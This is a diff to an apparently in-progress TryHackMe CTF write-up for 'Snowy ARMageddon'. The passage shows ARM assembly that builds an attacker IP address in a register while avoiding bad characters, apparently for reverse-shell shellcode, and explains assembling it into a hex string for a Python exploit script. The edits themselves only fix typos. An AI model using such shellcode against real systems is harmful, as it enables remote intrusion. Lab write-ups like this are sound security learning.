beta-j/TryHackMe-Rooms/--IN_PROGRESS-- Snowy ARMageddon.md

 lsl r1, #8      // shift by 8 bits to the left
 add r1, #0x34   // add '52' to R1
 lsl r1, #8      // shift by 8 bits to the left
-add r1, #0x08   // add '8' and '2' to R1 (since we cannot pass the hex value for 10; '0x0a'
+add r1, #0x08   // add '8' and '2' to R1 (since we cannot pass the hex value for 10; '0x0a')
 add r1, #0x02
 lsl r1, #8      // shift by 8 bits to the left
-add r1, #0x08   // add '8' and '2' to R1 (since we cannot pass the hex value for 10; '0x0a'
+add r1, #0x08   // add '8' and '2' to R1 (since we cannot pass the hex value for 10; '0x0a')
 add r1, #0x02
 push {r1}
 ```
-Now we can simply copy this set of instructions to the assembler and convert it to a hex string we can paste into the Python Script:
+Now we can simply copy this set of instructions to the assembler and convert it to a hex string that we can paste into the Python Script:
+_(Make sure to select `ARM` for the processor type and to copy the Little Endian output)_
 ![image](https://github.com/beta-j/TryHackMe-Rooms/assets/60655500/e90c2569-f13d-42d5-8eb3-3b0ecacc003c)

 You can follow [THIS LINK](https://shell-storm.org/online/Online-Assembler-and-Disassembler/?inst=mov+r1%2C+%230xf0++%0D%0Alsl+r1%2C+%238++++%0D%0Aadd+r1%2C+%230x34+++%0D%0Alsl+r1%2C+%238++++++%0D%0Aadd+r1%2C+%230x08+++%0D%0Aadd+r1%2C+%230x02%0D%0Alsl+r1%2C+%238++++++%0D%0Aadd+r1%2C+%230x08+++%0D%0Aadd+r1%2C+%230x02++++%0D%0Apush+%7Br1%7D++&arch=arm&as_format=inline#assembly) and simply change the `#0xf0` and `#0x34` values to correspond to your IP address - but remember to avoid using any *bad characters*!